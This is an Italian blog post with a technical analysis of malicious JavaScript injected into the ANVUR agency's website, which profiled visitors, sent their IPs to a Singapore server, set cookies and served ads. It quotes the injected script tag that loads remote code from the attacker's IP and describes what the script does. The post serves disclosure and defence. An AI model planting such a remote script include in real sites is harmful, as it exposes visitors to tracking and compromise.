Anvur / I nuovi mostri

Vai sul sito ANVUR? Uno script maligno registra il tuo profilo e lo manda a Singapore

«Suzuki, Vitara, il tuo stile di vita – scopri di più» «Food Marketing: scopri il corso di laurea sul Food e le sue strategie economico-commerciali»: pubblicità di automobili, ma anche di film in streaming e di un corso di Food Marketing proposto dall’Università Cattolica. Sono solo alcuni esempi delle pubblicità che alcuni utenti si sono visti comparire quando durante le vacanze di Pasqua si sono collegati al sito dell’ANVUR, finalmente risorto (si fa per dire) dopo 15 giorni di “fuori servizio”. Annunci a pagamento per ovviare alla carenza fondi? Niente di tutto questo. Da mesi in balia degli spammer, l’agenzia aveva smentito i timori, espressi sul Sole 24 Ore, di possibili “manipolazioni di dati sulle valutazioni delle università” e aveva assicurato un pronto ripristino.  Dopo il quale, però, i comportamenti anomali non sono cessati. Per venire incontro alle difficoltà tecniche dell’agenzia (che evidentemente ha adottato il fai-da-te anche in campo informatico, oltre che in quello bibliometrico), in questo post analizziamo il codice della sua home page, individuando le istruzioni anomale all’origine dei problemi. In particolare, abbiamo scoperto che chi apre www.anvur.org e www.anvur.it carica e fa eseguire sul proprio browser del codice maligno di terze parti, che registra il profilo dei visitatori, visualizza annunci pubblicitari, i cui profitti probabilmente andranno nelle mani degli spammer, e imposta un cookie a insaputa dell’utente. Nonostante tutto, potete dormire sonni tranquilli: conoscendo l’attitudine di ANVUR a far sparire documenti o a sostituirli, Roars ha da tempo messo in salvo una copia di tutti i rapporti e le tabelle VQR.  In caso di bisogno, l’agenzia potrà rivolgersi a noi per riavere le versioni originali.

Il 3 aprile scorso, chi cercava di aprire il sito dell’ANVUR trovava solo questo avviso:

Niente di particolarmente sorprendente per i lettori di Roars. Già qualche mese fa avevamo segnalato (“Buy VQR”, la pillola azzurra della valutazione) che le pagine dell’agenzia di valutazione erano infestate da pubblicità di rimedi contro l’impotenza maschile.

Che il sito sia rimasto fuori servizio per diversi giorni è sotto gli occhi di tutti, tranne che del Sole 24 Ore, il quale l’11 aprile (cioé più di una settimana dopo l’inizio del “fuori servizio”) scrive (il grassetto è nostro):

«Il sito è fuori servizio per manutenzione straordinaria a causa di attività sospette di alterazione dei contenuti. Ci scusiamo per il disagio». Questo il messaggio comparso ieri [in realtà, era comparso almeno otto giorni prima, NdR] sul sito dell’Agenzia nazionale per la valutazione dell’università e della ricerca finita nel mirino di un attacco hacker.. […] dopo il nuovo attacco che puntava all’«alterazione dei contenuti» – come noto l’Agenzia produce dati di monitoraggio molto sensibili e cruciali per decidere il riparto dei fondi tra gli atenei – l’Anvur ha deciso di procedere più rapidamente al trasferimento verso il nuovo sito che potrebbe essere operativo già nelle prossime ore o domani.

Attacco hacker al sito dell’Anvur: «Attività sospette di alterazione dei contenuti», Sole 24 Ore, 11.04.2017

Niente di che preoccuparsi insomma.

Ma ecco che, dopo appena un giorno, a rompere le uova nel paniere arriva Dario Braga, il quale, sempre dalle colonne del Sole 24 Ore, smonta la versione di comodo sulla durata del disservizio, non senza insinuare che le sospette manipolazioni dei dati sulla valutazione delle università possano essere severe (i grassetti sono nostri):

Il fatto che il sito dell’Anvur (agenzia nazionale di valutazione dell’università e ricerca) sia da molti giorni irraggiungibile «per manutenzione straordinaria a causa di attività sospette di alterazione dei contenuti» è inquietante. La preoccupazione è duplice: da un lato, il blackout mette in evidenza la vulnerabilità del sito di una Agenzia Nazionale e dall’altro dimostra che c’è chi può avere interesse a manipolare i dati sulla valutazione delle università e della ricerca. Vista la durata del blackout c’è da pensare che le sospette manipolazioni dei dati possano essere severe.

Anvur tra manipolazione e troppi parametri, Sole 24 Ore, 12.04.2017

All’Anvur, l’articolo di Braga deve essere piaciuto assai poco. Il sito continua a rimanere fuori servizio, ma sulla home page compare un nuovo avviso, che, oltre a procrastinare di un giorno la data del ripristino, ha tutta l’aria di essere stato scritto apposta per smentire i timori di Braga.

A furia di slittamenti, c’è chi pensa che per la resurrezione (del sito ANVUR) si debba aspettare la Pasqua, ma Venerdì Santo (14 aprile) il sito ritorna finalmente operativo.  Il calvario, però, è tutt’altro che finito.

Molti di coloro che si collegano (non tutti, perché se e quale annuncio far apparire, viene deciso … a Singapore) si vedono sollecitati a comprare automobili Suzuki Vitara, a guardare film in streaming, ad iscriversi ad un corso di Food Marketing dell’Università Cattolica e così via.

Degna di nota anche la pubblicità della laurea OnLine di eCampus (CEPU) e di un convenientissimo -40% sul cambio gomme.

Cosa è successo? Pietro De Nicolao ha analizzato per noi la home page di ANVUR e ha fatto alcune scoperte interessanti. Chi consulta il sito dell’agenzia di valutazione carica e fa eseguire sul proprio browser del codice maligno di terze parti (spammer, a giudicare dal profilo di VirusTotal), che registra il profilo dei visitatori, visualizza delle pubblicità, i cui profitti probabilmente andranno nelle mani degli spammer, e imposta un cookie a insaputa dell’utente. Non per niente, se cercate “anvur” su Google, scoprirete che il “sito potrebbe essere compromesso”.

Il seguente articolo spiega in dettaglio cosa non va nella home page dell’agenzia di valutazione. Ci auguriamo che sia di qualche aiuto per il ripristino del servizio. Inoltre, conoscendo l’attitudine di ANVUR a far sparire documenti o a sostiturli, Roars ha da tempo salvato una copia di tutti i rapporti e le tabelle della VQR.  In caso di bisogno, l’agenzia potrà rivolgersi a noi per riavere le versioni originali.

 

Analisi della pubblicità sulla home page del sito ANVUR

di Pietro De Nicolao

Il sito web dell’ANVUR, http://www.anvur.it, è stato recentemente attaccato dagli spammer che ne hanno approfittato per inserire pubblicità di viagra, ancora in parte presenti (basta cercare “anvur viagra” su Google per scoprire qualche pagina del sito web ufficiale di ANVUR dedicata ad una simpatica farmacia online).

Successivamente a questi fatti, che sono anche andati ad interessare alcune pagine interne al sito alterandone i contenuti, anvur.it è stato messo offline per qualche tempo, e poi rimesso online, presumibilmente dopo essere stato ripulito.

Ma gli sfortunati visitatori di anvur.it non sono al riparo dalle minacce informatiche, e qui spiegheremo perché.

Nella home page del sito anvur.it è presente la seguente riga di codice:

<script type=”text/javascript” src=”http://128.199.161.173/proxy/11/image13.js“></script>

Per chi non conoscesse le basi delle tecnologie del web, questo codice è una semplice inclusione di una risorsa JavaScript dentro la pagina web. L’URL dello script incluso è specificato nel parametro “src”. JavaScript è un linguaggio di programmazione che in questo caso è usato per eseguire, sul browser del visitatore, del codice.

È molto sospetto il fatto che lo script non sia servito dallo stesso host del sito dell’ANVUR, ma da un altro server, di cui non è nemmeno specificato il nome di dominio, ma solo l’indirizzo IP, 128.199.161.173.

Questo IP si trova nello Stato di Singapore, ospita contenuti dannosi secondo VirusTotal, ed è presente in qualche blacklist.

Quindi, visitando il sito dell’ANVUR, il browser dell’ignaro visitatore manda una richiesta HTTP anche a questo curioso host.

Andiamo ora a vedere il contenuto dello script che viene caricato ed eseguito. Il codice è offuscato: per comodità del lettore, ho caricato su Pastebin una versione de-offuscata usando il servizio JS-Nice (c’è anche la versione originale). Ecco ciò che ho notato.

  • Sono presenti molte funzioni che hanno lo scopo di profilare il browser e il dispositivo utilizzato dal visitatore allo scopo di capire se è un dispositivo mobile, se ha il touchscreen, qual è l’orientamento dello schermo, il sistema operativo, etc.
    Queste informazioni servono a visualizzare al meglio le inserzioni pubblicitarie (vedi sotto).
  • init(): se un certo cookie (vedi sotto) non è ancora definito, la funzione init() chiama initialize(), che include un altro script nella pagina: http://freegeoip.net/json?callback=g_callbackIp
    Questo script consiste di una riga di codice che chiama la funzione g_callbackIp, presente nello script originale, passando come parametro un dizionario che contiene alcuni dati relativi alla connessione dell’utente:
    g_callbackIp({“ip”:”1.2.3.4″,”country_code”:”IT”,”country_name”:”Italy”,”region_code”:”22″,”region_name”:”Lombardy”,”city”:”Milan”,”zip_code”:”20100″,”time_zone”:”Europe/Rome”,”latitude”:44.2343,”longitude”:10.7897,”metro_code”:0});
    (Ho modificato i miei dati personali per ovvie ragioni).
  • g_callbackIP(): a questa funzione vengono passati i dati appena ottenuti. La funzione esegue una richiesta a http://128.199.161.173/proxy/11/image21.php, (l’indirizzo IP degli spammer) includendo l’indirizzo IP del visitatore e un flag che dice se il dispositivo è mobile o desktop. Gli altri dati personali ottenuti nel passaggio precedente non vengono inviati al server.
    In base alla risposta che viene data dal server, lo script può fare una di queste due cose:
  • Imposta un cookie di durata 1 anno
  • Carica i banner di Google ed effettua delle modifiche grafiche alla pagine (funzioni loadScript() e update(text, inEdge))

In conclusione: sul sito di ANVUR c’è uno script di terze parti (spammer, a giudicare dal profilo di VirusTotal), che:

  1. profila i visitatori in base alle informazioni fornite dal browser e dalla connessione
  2. visualizza delle pubblicità, i cui profitti probabilmente andranno nelle mani degli spammer
  3. imposta un cookie di terze parti sul browser dell’utente

Includendo il codice delle inserzioni di Google, gli spammer avranno molto probabilmente accesso (mediante Google) anche ad una serie di dati molto dettagliati sui visitatori (indirizzo IP, Paese di origine, orari di accesso, numero di visite, etc.).

Sui cookie, inoltre, si potrebbe fare un’interessante osservazione. Il sito di ANVUR è in grado di impostare 3 classi di cookie sul browser dell’utente:

  1. I cookie di Google Analytics, servizio inserito da ANVUR stesso
  2. Il cookie inserito direttamente dallo script maligno
  3. I cookie relativi alle pubblicità di Google, che sono gestite dagli spammer

Attualmente, anvur.it non visualizza alcun avviso all’utente per informarlo dell’utilizzo dei cookie (che sono tutti di terze parti), in contrasto con quanto prescritto dal Garante della Privacy (cosiddetta “cookie law”).

Un consiglio ai webmaster di ANVUR: se proprio non siete capaci di evitare che gli spammer vadano ad inserire script e contenuti strani nel vostro sito, potete tentare di limitare i danni implementando correttamente la Content Security Policy, uno standard web supportato dai maggiori browser che permette di definire da quali host è lecito caricare i contenuti (script, immagini, …) che possono essere visualizzati nel proprio sito web.

 

Send to Kindle
Tag: , , , , , , , , , ,

6 Comments

  1. Giuseppe De Nicolao says:

    Non è la prima volta che assolviamo gratuitamente un ruolo di supplenza tecnica, spiegando all’ANVUR i suoi errori e fornendo analisi e consigli conformi allo stato dell’arte. Adesso che i nostri interventi, di solito circoscritti alla valutazione e alla bibliometria, si sono estesi anche alla sicurezza informatica (siamo i primi a capire quali difficoltà potesse incontrare ANVUR a reperire qualcuno che ne capisse qualcosa durante la pausa pasquale), l’agenzia potrebbe valutare l’opportunità di fare una donazione a Roars per il supporto che le prestiamo gratuitamente. Le istruzioni per i donatori sono disponibili qui:
    _____________________
    https://www.roars.it/online/sostieni-roars/

  2. indrani maitravaruni says:

    Non c’è alcun errore. L’acquisto del macchinone e il food marketing fanno parte degli attuali obiettivi educazionali.

  3. Alberto Baccini says:

    Dopo un paio di ore dalla pubblicazione di questo post il sito di ANVUR è stato posto in manutenzione straordinaria.

  4. Il caso è insieme grottesco e triste, triste per quel che riusciamo a commuoverci per le disavventure dell’Anvur. Per dirla schietta, per quel che possa importare, alla fin fine. Penso però che anche questa fiducia incrollabile nella assoluta affidabilità e sicurezza e certezza e perfezione dei nuovi mezzi informatizzati andrebbe ridimensionata in noi stessi, non perché tutto ciò che è umano è imperfetto, ma perché si tratta di tecnologie penso delicatissime che così vanno trattate. Soltanto nei film americani succede che i telefonini sono sempre carichi e funzionano quasi dappertutto. Nella realtà non è così. Comunque sia, sempre meglio questo delle pazzie di due megalomani psichiatrici che giocano con le armi nucleari. L’aspetto grottesco consiste, per me, nel fatto che non si rendono conto che devono abbassare la cresta, all’Anvur, e scendere dal loro “alto”, come diceva quel tale (chi fu?), e comportarsi da colleghi e guadagnare quanto loro e trattare gli altri con rispetto. Sempre che siano utili alla società. Nel loro piccolo sono megalomani (nani giganteschi!) anche loro e pensano che sia stato loro affidato un compito di bonifica (ora stanno anche girando per gli atenei a istruirli sul da farsi per accreditamenti e altro), mentre servono soltanto per camuffare strategie governative di risparmio, che vengono forse a costare più di quel che si risparmia. La meritocrazia è un concetto da applicare agli altri e non a se stessi. Ciò che si sente in giro, per i famosi corridoi, dove gli alti funzionari dell’Anvur non si degnerebbero di scendere, è che questa burocratizzazione di tutto e di tutti sta letteralmente uccidendo la gente. E questo non è grottesco.

  5. indrani maitravaruni says:

    L’informatica gli serve anche per controllare, uccidere e far sparire tutto ciò che non rientra nei loro piani.
    Noi abbiamo avuto a che fare con un programma che, male impostato (non recepiva determinati insegnamenti), rischiava di non far partire uno dei nostri corsi specialistici più prestigiosi. Per fortuna la cosa è stata risolta, ma se non fossimo riusciti a farlo funzionare? Credete che al ministero qualcuno si sarebbe mosso per noi in quanto persone, docenti e trasmettitori di sapere?
    Anzi, forse non esistiamo neppure.

Leave a Reply